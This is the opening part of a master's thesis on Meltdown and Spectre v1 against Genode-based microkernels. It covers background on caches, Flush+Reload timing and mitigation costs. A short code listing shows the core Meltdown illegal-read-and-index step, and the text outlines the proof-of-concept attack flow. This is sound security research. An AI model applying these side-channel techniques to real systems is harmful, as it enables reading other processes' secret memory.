Linköping University | Department of Computer and Information Science Master thesis, 30 ECTS | Datateknik 2019 | LIU-IDA/LITH-EX-A--19/045--SE

Examining the Impact of Micro- architectural Attacks on Micro- kernels – a study of Meltdown and Spectre

Gunnar Grimsdal Patrik Lundgren

Supervisor : Felipe Boeira Examiner : Mikael Asplund

External supervisor : Christian Vestlund

Linköpings universitet SE–581 83 Linköping +46 13 28 10 00 , www.liu.se Upphovsrätt

Detta dokument hålls tillgängligt på Internet - eller dess framtida ersättare - under 25 år från publiceringsdatum under förutsättning att inga extraordinära omständigheter uppstår. Tillgång till dokumentet innebär tillstånd för var och en att läsa, ladda ner, skriva ut enstaka kopior för enskilt bruk och att använda det oförändrat för ickekommersiell forskning och för undervisning. Överföring av upphovsrätten vid en senare tidpunkt kan inte upphäva detta tillstånd. All annan användning av dokumentet kräver upphovsmannens medgivande. För att garantera äktheten, säkerheten och tillgängligheten finns lösningar av teknisk och administrativ art. Upphovsmannens ideella rätt innefattar rätt att bli nämnd som upphovsman i den omfattning som god sed kräver vid användning av dokumentet på ovan beskrivna sätt samt skydd mot att dokumentet ändras eller presenteras i sådan form eller i sådant sammanhang som är kränkande för upphovsmannens litterära eller konstnärliga anseende eller egenart. För ytterligare information om Linköping University Electronic Press se förlagets hemsida http://www.ep.liu.se/.

Copyright

The publishers will keep this document online on the Internet - or its possible replacement - for a period of 25 years starting from the date of publication barring exceptional circumstances. The online availability of the document implies permanent permission for anyone to read, to download, or to print out single copies for his/hers own use and to use it unchanged for non- commercial research and educational purpose. Subsequent transfers of copyright cannot revoke this permission. All other uses of the document are conditional upon the consent of the copyright owner. The publisher has taken technical and administrative measures to assure authenticity, security and accessibility. According to intellectual property law the author has the right to be mentioned when his/her work is accessed as described above and to be protected against infringement. For additional information about the Linköping University Electronic Press and its procedures for publication and for assurance of document integrity, please refer to its www home : http://www.ep.liu.se/.

Gunnar Grimsdal © Patrik Lundgren Abstract

Most of today’s widely used operating systems are based on a monolithic design and have a very large code size which complicates verification of security-critical applications. One approach to solving this problem is to use a , i.e., a small kernel which only implements the bare necessities. A system using a microkernel can be constructed using the operating-system framework Genode, which provides security features and a strict hierarchy. However, these systems may still be vulnerable to microarchitectural attacks, which can bypass an ’s security features, exploiting vulnerable hardware. This thesis aims to investigate whether are vulnerable to the microarchitectural attacks Meltdown and Spectre version 1 in the context of Genode. Furthermore, the thesis analyzes the execution cost of mitigating Spectre version 1 in a Genode’s remote procedure call. The result shows how Genode does not mitigate the Meltdown attack, which will be confirmed by demonstrating a working Meltdown attack on Genode+. We also determine that microkernels are vulnerable to Spectre by demonstrating a working attack against two microkernels. However, we show that the cost of mitigating this Spectre attack is small, with a cost of 3% slowdown for remote procedure calls in Genode. Acknowledgments

We would like to thank all the people at Sectra Communications AB for their welcoming and assistance with our thesis. We would like to give special thanks to our supervisor Christian Vestlund for his engagement and supporting knowledge on side-channel attacks. Additionally, we would like to thank Jonathan Jogenfors for his useful insights on writing a thesis. From Linköping University, we would like to thank our examiner Mikael Asplund for his enthusiasm and academic input and Felipe Boeira for his feedback and support in writing our thesis.

iv Contents

Abstract iii

Acknowledgments iv

Contents v

List of Figures viii

List of Tables x

1 Introduction 2 1.1 Microkernel ...... 2 1.2 Genode ...... 3 1.3 Meltdown and Spectre ...... 3 1.4 Motivation ...... 4 1.5 Aim...... 4 1.6 Research Questions ...... 4 1.7 Delimitations ...... 5 1.8 Thesis Outline ...... 5

2 Background 6 2.1 CPU Optimizations ...... 6 2.1.1 ...... 6 2.1.2 Data Prefetching ...... 7 2.1.3 Out-of-Order Execution ...... 7 2.1.4 Speculative Execution ...... 7 2.1.5 TSX ...... 7 2.2 Timing Channels ...... 7 2.2.1 Cache-Based Timing Channels ...... 8 2.2.2 Accurately Measuring Time ...... 8 2.3 Flush+Reload ...... 9 2.3.1 Shared Memory ...... 9 2.3.2 Preventing Data Prefetching ...... 10 2.4 Meltdown ...... 10 2.4.1 ...... 10 2.4.2 Meltdown Attack Description ...... 11 2.4.3 Proof-Of-Concept Implementation ...... 11 2.4.4 Mitigations ...... 12 2.4.5 Meltdown on Genode ...... 12 2.5 Spectre ...... 12 2.5.1 Spectre V1 Attack Description ...... 13 2.5.2 Spectre V1 Mitigations ...... 13 2.5.2.1 Preventing Speculative Execution ...... 13

v 2.5.2.2 Index Bitmasking ...... 14 2.6 Performance ...... 15 2.6.1 Microkernel Performance ...... 15 2.6.2 IPC Performance ...... 15 2.7 Related Work ...... 15 2.7.1 Genode ...... 16 2.7.2 Side Channels ...... 16 2.7.3 Microarchitectural Attacks ...... 16 2.7.4 Linux Control Groups ...... 17 2.7.5 Security by Virtualization ...... 17

3 Method 18 3.1 Setting up System Under Test ...... 18 3.1.1 Using x86 Intrinsics ...... 18 3.1.2 Obtaining Output ...... 19 3.1.3 Building and Running on Nova ...... 20 3.1.4 Building and Running on Okl4 ...... 20 3.1.5 Building and Running on Linux ...... 21 3.1.6 Measuring Throughput ...... 21 3.2 Implementing the Flush+Reload Channel ...... 22 3.2.1 Measuring Cache Hits ...... 22 3.2.2 Preventing Data Prefetching ...... 23 3.2.3 Adapting the Channel to Targeted Kernels ...... 24 3.2.4 Measuring Throughput of the Covert Channel ...... 25 3.2.5 Reducing Noise ...... 25 3.3 Implementing Meltdown ...... 26 3.3.1 Recovering from ...... 26 3.3.2 Disabling Mitigations ...... 26 3.3.3 Choosing a Target Address ...... 26 3.4 Implementing Spectre ...... 27 3.4.1 Ensuring Speculative Execution ...... 28 3.4.2 Configure Variables for Spectre ...... 28 3.4.3 Measuring Throughput ...... 29 3.4.4 Measuring Impact of Mitigations ...... 29

4 Results 30 4.1 Flush+Reload ...... 30 4.1.1 Choosing Cache-Hit Thresholds ...... 30 4.1.2 Preventing Data Prefetching ...... 31 4.1.3 Measuring Throughput ...... 33 4.1.4 Reducing Noise ...... 33 4.2 Meltdown ...... 37 4.2.1 Reading a Victim’s Secret ...... 37 4.2.2 Reading the Linux Version Banner ...... 37 4.3 Spectre ...... 37 4.3.1 Training the Branch Predictor ...... 37 4.3.2 Ensuring Speculative Execution ...... 39 4.3.3 Attack Throughput ...... 39 4.3.4 Mitigations ...... 39 4.3.5 Error Sources ...... 41

5 Discussion 43 5.1 Flush+Reload ...... 43

vi 5.1.1 Cache-Hit Measurements ...... 43 5.1.2 Choosing Cache-Hit Thresholds ...... 44 5.1.3 Preventing Data Prefetching ...... 44 5.1.4 Inaccuracies in Throughput Measurements ...... 44 5.1.5 Reducing Noise ...... 45 5.2 Meltdown ...... 45 5.2.1 Alternative Segmentation Fault Recovery ...... 45 5.2.2 Turning off Mitigations ...... 45 5.2.3 The Difficulties of Reading Secrets ...... 45 5.2.4 Reliability Issues with Meltdown ...... 46 5.3 Spectre ...... 46 5.3.1 Training the Branch Predictor ...... 46 5.3.2 Criticism of Heuristic Cache Flush ...... 46 5.3.3 Throughput Anomalies ...... 46 5.3.4 Small Impact on Performance ...... 47 5.4 Source criticism ...... 47 5.5 The Work in a Wider Context ...... 48 5.5.1 Can OS Memory Separation be Trusted? ...... 48 5.5.2 Can Hardware Separation be Trusted? ...... 48 5.5.3 Consequences for Security and Safety Critical Systems ...... 48 5.5.4 Impact of This Work ...... 49

6 Conclusion 50 6.1 Future Work ...... 51

Bibliography 52

vii List of Figures

2.1 A model of composition...... 11

3.1 Overview of Genode’s Hierarchy ...... 19 3.2 The communication setup to retrieve output from the tested system...... 19 3.3 A receiver observing access times for a cache hit on a Flush+Reload channel, built on a contiguous padded array...... 22 3.4 A model of memory access times for different memory levels...... 23 3.5 A sequence diagram for measurements of the LLC access times...... 23 3.6 Leak Array Layout ...... 24 3.7 A sequence diagram of Flush+Reload communication between two processes. . . . 25 3.8 A sequence diagram of Meltdown using Intel TSX and Flush+Reload...... 26 3.9 A sequence diagram of Spectre using Flush+Reload...... 27

4.1 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Okl4...... 31 4.2 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Nova...... 31 4.3 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Linux...... 32 4.4 Time to access values in a pseudo-randomized or sequential pattern using 256 bytes as internal padding on OKl4...... 32 4.5 Time to access values in a pseudo-randomized or sequential pattern using 4096 bytes as internal padding on Okl4...... 33 4.6 Throughput from reading 2048 bytes from another process in Genode using Meltdown on Genode+Linux...... 37 4.7 Throughput out of for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Okl4...... 38 4.8 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Nova...... 38 4.9 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Linux...... 38 4.10 Throughput for Spectre V1 using different choices of Hs for heuristically flushing the cache...... 39 4.11 Measurements of execution time of RPC on Genode+Okl4 using Spectre V1 mitigations...... 40 4.12 Measurements of execution time of RPC on Genode+Nova using Spectre V1 mitigations...... 40 4.13 Measurements of execution time of RPC on Genode+Linux using Spectre V1 mitigations...... 41 4.14 Percentage of correctly read bytes from reading 2048 bytes and compiling the application between each test...... 42

viii 4.15 Percentage of correctly read bytes from reading 2048 bytes from running the same binary multiple times on Linux...... 42

ix List of Tables

4.1 The Cache-hit thresholds in CPU cycles for each kernel...... 31 4.2 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Okl4 for different internal padding sizes...... 31 4.3 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Nova for different internal padding sizes...... 32 4.4 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Linux for different internal padding sizes...... 32 4.5 Reading 2048 bytes with Flush+Reload within one process...... 33 4.6 Reading 2048 bytes with Flush+Reload between two processes...... 34 4.7 Reading 2048 bytes using Flush+Reload within a process on Genode+Okl4 with different number of attempts...... 34 4.8 Reading 2048 bytes using Flush+Reload within a process on Genode+Nova with different number of attempts...... 34 4.9 Reading 2048 bytes using Flush+Reload within a process on Genode+Linux with different number of attempts...... 35 4.10 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Okl4 with different number of attempts...... 35 4.11 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Nova with different number of attempts...... 35 4.12 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Linux with different number of attempts...... 36 4.13 Result of reading 2048 bytes with Spectre V1 with chosen parameters...... 39 4.14 Mean relative slowdown and standard deviation after applied lfence mitigation. 41 4.15 Mean relative slowdown and standard deviation after applied bitmask mitigation. 41

x List of Tables

1 1 Introduction

Most of today’s widely used Operating Systems (OSs) like Windows, GNU/Linux and OSX1 are based on a monolithic design, meaning that all parts of the operating system act as a trusted part of the kernel. In such a design, drivers, file system and Inter-Process Communication (IPC) are all handled as part of the kernel and trusted as such. Consequently, a flaw in any of these trusted components may compromise the entire kernel. Moreover, OSs based on a monolithic design, like Windows and GNU/Linux, are difficult to verify due to their size. The Linux kernel contains millions of lines of source code and is frequently updated [6]. While there have been efforts to formally verify the correctness of software against a specification this has only been performed on a much smaller scale. The Sel4 kernel, with its 9300 lines of code [23], has been formally verified against its specification at the cost of roughly 20 to 1 verification code against source code and 22 person-years of work2. Microsoft researchers Hawblitzel et al. have in the Ironclad project [16], instead of focusing on application verification, used automated tools to verify security-critical libraries. The Ironclad project achieved a less costly verification at a 4.8 to 1 line of verification to source code and 3 person-years of work. However, the fact remains that formal verification is very costly, and that OSs containing millions of lines of code are with today’s tools far out of reach at a 5 times increase in development cost.

1.1 Microkernel

One approach to mitigate this size issue is to replace the monolithic kernel with a microkernel. A microkernel is a small kernel, typically containing only around 10,000 lines of code3. This small size stems from one of the leading design goals of a microkernel, which is to run most services in and providing only essential functionality in kernel space. This type of design reduces the amount of privileged code and may reduce the risk that kernel-level services are compromised. It also allows for the possibility of disabling unneeded services, which is important as it may reduce the attack surface of the kernel.

1Operating System Market Share Worldwide. en. May 2019. URL: http://gs.statcounter.com/os-market- share (visited on 2019-05-06). 2DATA61. The seL4 verification project. Jan. 2019. URL: http://ts.data61.csiro.au/projects/seL4- verification/ (visited on 2019-01-07). 3OSDev. Microkernel. 2019. URL: https://wiki.osdev.org/Microkernel (visited on 2019-01-03).

2 1.2. Genode

1.2 Genode

The small amount of code in microkernels may result in lack of some useful functionality such as protocol stacks and network drivers. Genode is a framework for building secure OSs using a microkernel and tries to address the issue of missing OS components [7]. Genode provides more than 100 ready-to-use components such as network drivers and protocol stacks. In Genode, as many components as possible are executed in user space. One key feature of Genode is that components are assigned a budget by its parent process for resources such as CPU-time, memory and file system access. Genode has been developed to run on multiple kernels, for example, Nova, Okl4 and Linux. The Nova kernel, which is a microhypervisor, is a research project aimed at secure virtualization. Similar to a microkernel, it provides essential functionality for virtualization like communication, scheduling and resource management4. Okl4 is an open-source microkernel based on the L4 microkernel. It can be used as a hypervisor or as a real-time OS and has been used practically by General Dynamics5. Genode tries to achieve a secure OS design by carefully isolating components using hardware and software separation [7]. Microarchitectural attacks have in some ways compromised software and hardware separation. These attacks exploit the microarchitectural state of the CPU, e.g., caches or Translation Lookaside Buffer (TLB). Such attacks may break software which is dependent on a correct hardware implementation. This class of attacks has had recent success in the form of Meltdown and Spectre [31, 24].

1.3 Meltdown and Spectre

Meltdown is a microarchitectural attack which exploits the fact that some modern CPUs may execute instructions out of order [31]. Specifically, Meltdown can read memory from an addressable memory space which it should not be able to read from. Lipp et al. [31] used a Meltdown exploit to read memory from the kernel and other user processes in Linux. This was possible as the Linux kernel’s memory was mapped into the address space of each user process. Genode’s founder Feske has stated that some in-kernel data structures in Genode are likely vulnerable to the Meltdown attack6. Spectre relies on the fact that some modern CPUs may speculatively execute instructions [24]. There are different versions of the Spectre attack [42, 24, 33], we will be looking at Spectre version 1. Spectre version 1 exploits speculative execution to bypass boundary checks. An attacker could use this attack to execute code which bypasses a boundary check and leaks information to the attacker. Both Meltdown and Spectre rely on an attacker being able to transmit gathered data to and from the cache. Flush+Reload is a Side-Channel Attack (SCA) which abuses the time difference of fetching uncached and cached data [48]. This channel can be used in the context of Meltdown and Spectre to first read kernel memory into a cache exploiting their respective CPU optimizations. If the address which is cached is carefully crafted, the time with which a process can access this address can be measured to retrieve information. SCAs extract information from another system or user by abusing some aspects of the system which are not supposed to transmit information. A side channel can also be used as a covert channel, i.e., a channel in which two colluding actors communicate via a side channel.

4NOVAMicrohypervisor. URL: http://hypervisor.org/ (visited on 2019-03-19). 5General Dynamics. Hypervisor Products - General Dynamics Mission Systems. en. 2018. URL: https : / / gdmissionsystems.com/en/products/secure-mobile/hypervisor (visited on 2019-03-22). 6N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/ mailman/message/36178974/ (visited on 2019-01-16).

3 1.4. Motivation

1.4 Motivation

Software separation may work as mitigation against some microarchitectural attacks. Lipp et al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed (KAISER) patch mitigates Meltdown [31]. KAISER removes the kernel map from user space and therefore removes Meltdown’s ability to access kernel memory7. However, the methods used to mitigate Meltdown significantly impact performance [36]. There have been efforts to mitigate the Spectre attack. However, mitigations against Spectre attacks are focused on treating the symptoms of the attack rather than preventing it. This is due to the fact that disabling speculative execution is usually not supported and that any CPU performing speculative execution may leak data [33]. Thus, the options to address the problem are either to mitigate the attacks in software or the very expensive options of replacing speculating CPUs for non speculating ones. The Genode OS framework is interesting from a security standpoint for its strict process separation, its adherence to a minimal kernel and open-source code. However, it has been suggested by Feske that some information can leak from Genode by the Meltdown attack8.A successful attack may compromise security guarantees which is the very reason to reach for Genode. Furthermore, Feske states that there have been no efforts to mitigate Spectre attacks. Schmidt et al. [39] demonstrated ways to circumvent security policies for Genode’s IPC. Schmidt et al. implemented a covert channel which abused a file system cache in Genode. The covert channel Schmidt et al. created could transfer data with a rate of 2 /s between two user owned processes. To the best of our knowledge, there has been no previous work demonstrating a violation of Genode’s memory separation.

1.5 Aim

This thesis aims to study the impact of microarchitectural attacks on microkernels. In particular, we aim to demonstrate the effectiveness of Meltdown and Spectre on microkernels as well as to measure the performance impact after Spectre version 1 mitigations have been applied.

1.6 Research Questions

1. Can Flush+Reload be used to create a covert channel between two processes in Genode, measured as the throughput of demonstrated channel? We answer this research question by demonstrating a working Flush+Reload channel between two processes in Genode. We define throughput as the number of successfully transmitted bytes per second.

2. Are Remote Procedure Call (RPC) mechanisms in the microkernels Nova and Okl4 vulnerable to the Spectre Version 1 (Spectre V1) attack, measured as throughput of demonstrated attack? We answer this research question by demonstrating a Spectre attack exploiting a victim using bounds-checked array access. The target implements a vulnerable RPC which is one of Genode’s mechanisms for IPC.

3. Can the Meltdown attack be executed on Genode? We answer this research question by demonstrating that Meltdown can be used to read data from another process.

7J. Corbet. KAISER: hiding the kernel from user space [LWN.net]. Nov. 2017. URL: https://lwn.net/Articles/ 738975/ (visited on 2019-01-22). 8N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/ mailman/message/36178974/ (visited on 2019-01-16).

4 1.7. Delimitations

4. What is the performance impact of Spectre V1 Spectre mitigations alternatives, measured as relative slowdown of RPC mechanisms? To answer this research question, we apply different mitigations and measure their respective performance impacts for each targeted kernel.

We reproduce Spectre on Genode+Okl4 and Genode+Nova with a throughput of  2 kB/s using Flush+Reload. Furthermore, we demonstrate Meltdown on Genode+Linux by reading memory from a victim process, transmitting up to  9 kB/s. In addition, we show that the performance impact of two different Spectre V1 mitigations on Genode’s RPCs is negligible. Consequently, we demonstrate that these microkernels are not secure by design and that Genode does not provide protection against microarchitectural attacks.

1.7 Delimitations

The scope of this thesis is limited to attacking Genode on chosen hardware (Intel Core i5-7500 CPU). There will not be any efforts to compare results on different types of hardware, nor will there be efforts to evaluate kernels which are not supported by Genode.

1.8 Thesis Outline

This thesis begins by introducing the fundamentals of CPU optimizations as well as more detailed information regarding the workings of microarchitectural attacks and performance measurements in Chapter 2. The method used to obtain results is presented in Chapter 3 and results in Chapter 4. Work presented in a wider context and answers to research questions are presented in Chapter 5 and Chapter 6 respectively.

5 2 Background

To understand the workings and implications of Meltdown and Spectre there is a need for a fundamental understanding of CPU optimizations. Thus, this chapter begins by describing the main optimizations which are utilized in the attacks. Furthermore, an understanding of timing channels is needed to understand the tools with which microarchitectural leak information. For this reason, this chapter continues by describing timing channels before moving on to the Meltdown and Spectre attacks.

2.1 CPU Optimizations

Modern CPUs use many kinds of optimizations to reduce execution time, some of which need be taken into account by a developer, others which seamlessly optimize executing code. Some of these optimizations may have noticeable effects on code execution, often relating to reduced execution time. For this reason, these optimizations are relevant to the use of timing channels.

2.1.1 Cache The time it takes to access data from DRAM is a bottleneck in modern computers, one memory access to DRAM can take  240 CPU cycles on an Intel Pentium M processor [15]. Modern CPUs also contain faster memory called cache. The cache is often divided into different levels, where the levels closer to the CPU core are faster but smaller than the cache on higher levels [15]. The number of cache levels varies depending on which CPU is used. The cache closest to the core is called L1 cache, on the next level is the L2 cache and so on [15]. The highest level cache is called Last-Level Cache (LLC) and is often the L2 or L3 cache in Intel CPUs, this cache is shared between multiple cores on multi-core CPUs [48]. The CPU used in this thesis has three cache levels, L1, L2 and LLC; witch can be seen by running the command lscpu in the Linux terminal. Memory accesses which resolve to a cache access are usually referred to as cache hits, whereas memory accesses which do not are referred to as cache misses.

6 2.2. Timing Channels

2.1.2 Data Prefetching Data prefetching is an optimization which speculatively loads data into cache before it is explicitly used. This is done to improve the performance of predictable access patterns, such as sequential access [19].

2.1.3 Out-of-Order Execution Modern CPUs have an optimization which allows the CPU to execute instructions out of order [19]. Out-of-Order Execution (OOE) allows instructions to be executed simultaneously or before preceding instructions, this is done to minimize the time the CPU is stalled [19]. Listing 2.1 shows an example in which OOE can reduce execution time. Line 1 fetches memory located at ptr, and line 2 cannot be executed while this fetching is in progress. The CPU can, therefore, execute the instruction on line 3 while waiting for the data to be fetched. Listing 2.1: Example of Out-of-Order Execution 1 mov edx, [ptr]; Copy data from memory located at ptr to edx 2 add edx, 1; Add1 to edx 3 mov ebx, 1; Copy1 to ebx, may execute before line2

2.1.4 Speculative Execution Speculative execution is a technique for reducing the execution time of programs by speculatively executing a branch which has yet to be determined valid [18]. If the branch is determined invalid, the result of the computations are reversed, returning the CPU to its state before the speculative execution [18]. However, speculative execution may alter the microarchitectural state of the processor, including TLB and caches [18]. The Branch-Prediction Unit (BPU) makes different types of predictions for branches to enable faster execution. For conditional branches, the BPU a predicts either a false or true outcome depending on values stored in the Branch-Target Buffer (BTB) [19].

2.1.5 Intel TSX Some Intel processors support the so-called Intel Transactional Synchronization Extension (TSX). This extension allows for transactional execution of code under some restrictions [20]. At its core, Intel TSX allows for executing some instructions as a transaction, either committing the result of these instructions or aborting, subsequently reverting changes to the CPU’s state from the computations. Similarly to speculative execution, Intel TSX does not revert microarchitectural state [20] and may thus leave information in the cache from an aborted transaction.

2.2 Timing Channels

Lampson wrote a paper defining covert channels in 1973, his definition was:

”Covert channels, i.e. those not intended for information transfer at all, such as the service program’s effect on the system load.” [27, p. 4]

Hence, a covert channel is a communication channel which abuses a resource or a component which is not intended for communication. Side channels are unintended communication channels which depend on the physical implementation of a system rather than a theoretical weakness of it [11]. We distinguish side channels from covert channels in that a covert channel is between two or more cooperating agents, while a side channel is one received by an attacker to spy on a victim.

7 2.2. Timing Channels

Timing channels are a subset of SCAs, where an attacker examines the time it takes for a certain task. Brumley and Boneh [2] executed a timing attack against a server running Apache with OpenSSL. Brumley and Boneh could extract the RSA key from the server by executing malformed SSL handshake multiple times, measuring the server’s response time to retrieve information from the computations.

2.2.1 Cache-Based Timing Channels One category of these timing-channel attacks are cache-based channels; these attacks utilize that access time for a varies dependent on whether value is stored in the cache or not [8]. Cache-based channels include: Prime+Probe, Flush+Reload and Evict+Time [8, 48].

2.2.2 Accurately Measuring Time A reliable way to measure the time it takes for a value to be accessed is a necessity for a cache-based timing channel to be implemented. Paoloni [34] has published guidelines for benchmarking code execution on Intel 32 and 64-bit architectures. Paoloni describes the use of the Time-Stamp Counter (TSC) which counts the CPU cycles for measuring time. Intel 32 and 64 bit architectures come with two instructions for reading TSC: rdtsc and rdtscp. Paoloni recommends measurement using the timer in Listing 2.2 which uses the instructions rdtsc, rdtscp and cpuid to prevent OOE. Yarom and Falkner noted that use of the instruction cpuid may not be desirable for cross Virtual Machine (VM) channels as the instruction may be emulated by the Virtual Machine Monitor (VMM) [48]. In place of the cpuid instruction they instead use a load fence, a tool which stalls the CPU until all previous loads have resolved. The rdtsc instruction reads the TSC into the CPU registers edx and eax. Similarly, rdtscp reads TSC into these registers but additionally waits for previous instructions to have executed [34]. Paoloni also suggests an alternative method, presented in Listing 2.3, for when the rdtscp instruction is not available. Listing 2.2: Timer Recommended by Intel 1 cpuid; Prevent OOE for previous instructions 2 rdtsc; Read TSC into edx, eax 3 mov var1, edx,; Store TSC in var1 and var2 4 mov var2, eax; 5 ; Call measured function here 6 rdtscp; Serialize previous instructions and read TSC 7 mov var3, edx; Store second TSC into var3 and var4 8 mov var4, edx; 9 cpuid; Prevent OOE for following instructions

8 2.3. Flush+Reload

Listing 2.3: Alternative Timer Recommended by Intel 1 cpuid; Prevent OOE for previous instructions 2 rdtsc; Read TSC into edx, eax 3 mov var1, edx,; Store TSC in var1 and var2 4 mov var2, eax; 5 ; Call measured function here 6 cpuid; Serialize previous instructions 7 rdtsc; Read TSC 8 mov var3, edx; Store second TSC into var3 and var4 9 mov var4, edx; 10 cpuid; Prevent OOE for following instructions

2.3 Flush+Reload

Flush+Reload is a cache-based timing channel designed by Yarom and Falkner [48] which exploits timing of the LLC. Therefore, Flush+Reload does not require that the attacker and victim run their respective processes´ on the same CPU core. Flush+Reload relies on sharing pages with a victim process, as this allows for Flush+Reload to control caching of these shared pages [48]. The attack Yarom and Falkner developed works by evicting a specific memory line using clflush, subsequently letting the victim execute. After the victim has executed the attacker can now check whether the evicted line is once again in cache. Checking whether the value is in the cache is done by defining a machine-specific time threshold below which values are considered cache hits. Yarom and Falkner profiled cache misses using clflush to define the threshold. Zhou et al. [50] presented a method to choose the threshold for Flush+Reload and concluded that the threshold should be below the but close to the lower boundary of DRAM access times. Yarom and Falkner note that some CPU optimizations may result in false positives, e.g. speculative execution or data prefetching. Consequently, it is desirable to have strategies to filter these false positives, Yarom and Falkner do not suggest methods for filtering these false positives.

2.3.1 Shared Memory One requirement for Flush+Reload is the availability of shared memory between the attacker and the victim. Multiple processes can have access to a shared physical memory space in modern OSs1. One reason for using shared memory is to optimize memory usage when multiple processes are using the same library [31]. The OSs may have a library loaded once into physical memory and reference the memory space with different virtual memory addresses. Hence, instead of every process loading the library in its own user space, the library is only loaded once and after that shared by multiple processes. User processes can also use shared memory for IPC in some OSs [31]. This mechanisms for optimizing used of shared libraries have been used by [48] to extract encryption keys via a Flush+Reload side channel. Genode has a strict separation between its processes and should, therefore, not optimize the memory usage by sharing memory [7]. However, a Flush+Reload channel may still be used between to processes sharing memory for IPC2.

1M. T. Jones. Anatomy of Linux dynamic libraries. 2008. URL: https://www.ibm.com/developerworks/ linux/library/l-dynamic-libraries/ (visited on 2019-01-17). 2N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/ mailman/message/36178974/ (visited on 2019-01-16).

9 2.4. Meltdown

2.3.2 Preventing Data Prefetching Several techniques have been shown to be effective at preventing data prefetching. Reads using randomized order or a random-order linked list are techniques which have been suggested by Liu et al. [32] to prevent data prefetching. Kocher et al. [24], although not explicitly stated, utilize a form of strided reads in their POC, thus preventing data prefetching. We will denote the form of strided reads used by Kocher et al. as Strided Read Generators (SRGs) which can be constructed as

xsi = ai + b mod m where, a  1 (mod p) for all prime factors p in m. For example, choosing a, b and m as $ &'a = 127 b = 0 %' m = 256

P t u P t u gives a sequence xsi 0, 127, 1, 128 from a sequence i 0, 1, 2, 3 .

2.4 Meltdown

Meltdown is a microarchitectural attack leveraging OOE execution in some modern processors to leak memory via a cache covert channel. The OOE execution is used to modify the contents of the cache; subsequently, the altered cache is read via a covert channel [31]. Lipp et al. [31] describes two practical Meltdown attacks. The first attack described how an attacker could read stored passwords from running on the same machine [31]. The second attack demonstrated how an attacker could exploit a system to dump the memory from another process, even with Kernel Address Space Layout Randomization (KASLR) active [31]. KASLR is a mechanism which randomizes the kernel space memory layout at boot time [9].

2.4.1 Virtual Address Space The process executing the Meltdown attack is required to have a virtual memory address corresponding to the physical memory address where the targeted data is located. Virtual memory is designed to isolate processes from each other. Virtual memory also acts as an abstraction from hardware and physical memory, exposing a conceptually infinite space of memory [15, p.38]. Hat [15] explains how the virtual address is split, one part indexing a page directory entry, the other indexing an offset within that page. Multiple page directory entries may resolve to the same physical memory page. Shared memory is commonly implemented in this way, i.e. mapping multiple virtual addresses to the same physical memory address [15, p.38]. Figure 2.1 shows the virtual memory map of a process running on 64 bit Linux. The process’s memory space, i.e. user space, is located at the lower address range and the kernel at the highest address range. In between user and kernel space is unused address space. The layout of the kernel space is the same for all user processes in Linux. This is done to remove the need of swapping the Memory-Management Unit (MMU) when switching to kernel mode, which is a costly operation3.

3J. Corbet. KAISER: hiding the kernel from user space [LWN.net]. Nov. 2017. URL: https://lwn.net/Articles/ 738975/ (visited on 2019-01-22).

10 2.4. Meltdown

0x0000000000000000 0xFFFFFF8000000000

User Space Unused Space Kernel Space

0x0000008000000000 0xFFFFFFFFFFFFFFFF

Figure 2.1: A model of virtual memory composition.

2.4.2 Meltdown Attack Description An attacker can read some data and use this data to index in an array. The attacker could then use a covert cache channel to inspect which index in the array was accessed to see what the initial data was. The Meltdown attack is performed in this way; indexing an array with the value from an illegal memory access. This will on most kernels raise a segmentation fault, preventing the address of being read and triggering signal handling. However, if the CPU uses OOE execution, the array may be indexed with the data before the signal handling occurs [31]. Listing 2.4 shows an example of how the Meltdown attack may work. Here the data from the address 0x7ffffdf9d580 is saved to a variable with which the array data is indexed. If OOE execution is available, the access of data may occur before the signal handling and leave the data in the cache. For Meltdown to read a memory address, that address needs to be mapped into the address space of the user process, i.e., the user process needs to have access to virtual memory corresponding to the physical memory of the process under attack [31]. Listing 2.4: Meltdown Memory Access 1 // Illegal memory read 2 char ill = * (char*) 0x7ffffdf9d580; 3 // PAGE_SIZE offset is to prevent the prefetcher from 4 // fetching adjacent data,i.e. so that 5 // the exact value of ill can be identified when with Flush+Reload 6 data[ill * PAGE_SIZE] = 0;

2.4.3 Proof-Of-Concept Implementation Lipp et al. [31] created a Proof-Of-Concept (POC) implementation for Meltdown which can be found on Github4. The control flow of the attack is implemented as follows:

1. Flush the shared array from the cache.

2. Access shared memory array at an address calculated based on the value at the targeted address.

3. Recover from the triggered segmentation fault.

4. Test indices in the shared array for a cache hit.

4https://github.com/IAIK/meltdown

11 2.5. Spectre

Several tools have been used to execute these steps. To flush the targeted address, the clflush instruction has been used [31]. Shared memory is used in the case of Flush+Reload, which is a well-performing side channel [48]. Recovering from the segmentation fault can be handled in Linux via the use of custom signal handlers, or more efficiently via the use of Intel TSX [31]. For the last step of testing values for cache hits, two methods are presented here; test after each read and test all values after a single read. The latter is discussed as two versions, firstly, testing all values using a mixed order iteration and secondly, to test all values using a large offset. In addition, it is necessary to accurately determine to which cache level a memory access was made. To do this, a high-resolution timer like the TSC can be used [31]. They are, however, not necessary as there are techniques to construct a high-resolution timer from lower resolution ones [41]. An attacker targeting Genode and microkernels has some limitations related to the tools discussed above. Signal handling of certain signals are not as flexible as needed on Genode, including handling of segmentation faults [7]. Caching of targeted data may pose as an unreasonable prerequisite. Intel TSX has been utilized in place of signal handling to recover from the segmentation fault; this method has been proven as the most effective [31]. The reason being that there is hardware support for reverting a transaction. Thus, the OS cannot observe that a faulty access was made during this transaction [31].

